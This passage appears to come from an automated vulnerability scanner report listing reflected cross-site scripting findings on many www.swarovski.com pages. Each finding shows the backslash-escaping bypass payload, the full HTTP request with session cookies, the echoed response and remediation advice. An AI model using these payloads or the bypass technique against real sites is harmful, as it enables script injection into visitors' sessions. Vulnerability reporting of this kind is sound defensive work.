The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 327d3\'%3balert(1)//470df5ae6b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 327d3\\';alert(1)//470df5ae6b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/crystal_society?327d3\'%3balert(1)//470df5ae6b9=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... nity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_CrystalSociety-ViewPage', query: '327d3\\';alert(1)//470df5ae6b9=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.23. http://www.swarovski.com/Web_US/en/customer_service [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/customer_service
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8768f\'%3balert(1)//e0bfce5c152 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8768f\\';alert(1)//e0bfce5c152 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/customer_service?8768f\'%3balert(1)//e0bfce5c152=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... ity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_CustomerService-ViewPage', query: '8768f\\';alert(1)//e0bfce5c152=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.24. http://www.swarovski.com/Web_US/en/dataprotection [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/dataprotection
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d0c8\'%3balert(1)//9f86821e0e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1d0c8\\';alert(1)//9f86821e0e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/dataprotection?1d0c8\'%3balert(1)//9f86821e0e3=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... ty/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Footer-ViewDataProtection', query: '1d0c8\\';alert(1)//9f86821e0e3=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.25. http://www.swarovski.com/Web_US/en/embedded_microsite [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/embedded_microsite
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f7ed\'%3balert(1)//215332f6ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f7ed\\';alert(1)//215332f6ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/embedded_microsite?8f7ed\'%3balert(1)//215332f6ab=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_EmbeddedMicrosite-ViewFlashTheme', query: '8f7ed\\';alert(1)//215332f6ab=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.26. http://www.swarovski.com/Web_US/en/giftcentre [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/giftcentre
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5998\'%3balert(1)//ecac31f4e8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5998\\';alert(1)//ecac31f4e8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/giftcentre?e5998\'%3balert(1)//ecac31f4e8c=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_GiftCentre-ViewPage', query: 'e5998\\';alert(1)//ecac31f4e8c=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.27. http://www.swarovski.com/Web_US/en/imprint [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/imprint
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f64c\'%3balert(1)//6a4e240ceec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f64c\\';alert(1)//6a4e240ceec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/imprint?9f64c\'%3balert(1)//6a4e240ceec=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... .enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Footer-ViewImprint', query: '9f64c\\';alert(1)//6a4e240ceec=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.28. http://www.swarovski.com/Web_US/en/index [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/index
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9c40\'%3balert(1)//2a75e960d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9c40\\';alert(1)//2a75e960d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/index?d9c40\'%3balert(1)//2a75e960d9=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... nfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_LandingPage-ViewPage', query: 'd9c40\\';alert(1)//2a75e960d9=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.29. http://www.swarovski.com/Web_US/en/magazine [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/magazine
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b07c\'%3balert(1)//2344600ba4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b07c\\';alert(1)//2344600ba4e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/magazine?1b07c\'%3balert(1)//2344600ba4e=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... P.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Magazine-ViewPage', query: '1b07c\\';alert(1)//2344600ba4e=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.30. http://www.swarovski.com/Web_US/en/online_shop [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/online_shop
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97361\'%3balert(1)//bdf29445caa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 97361\\';alert(1)//bdf29445caa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/online_shop?97361\'%3balert(1)//bdf29445caa=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... P.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_ShopPage-ViewPage', query: '97361\\';alert(1)//bdf29445caa=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.31. http://www.swarovski.com/Web_US/en/scs_join [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/scs_join
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e329c\'%3balert(1)//45ed15a3e2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e329c\\';alert(1)//45ed15a3e2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/scs_join?e329c\'%3balert(1)//45ed15a3e2a=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... nity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_SCSApplication-ViewPage', query: 'e329c\\';alert(1)//45ed15a3e2a=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.32. http://www.swarovski.com/Web_US/en/scs_login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/scs_login
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd204\'%3balert(1)//123e81b987d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd204\\';alert(1)//123e81b987d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
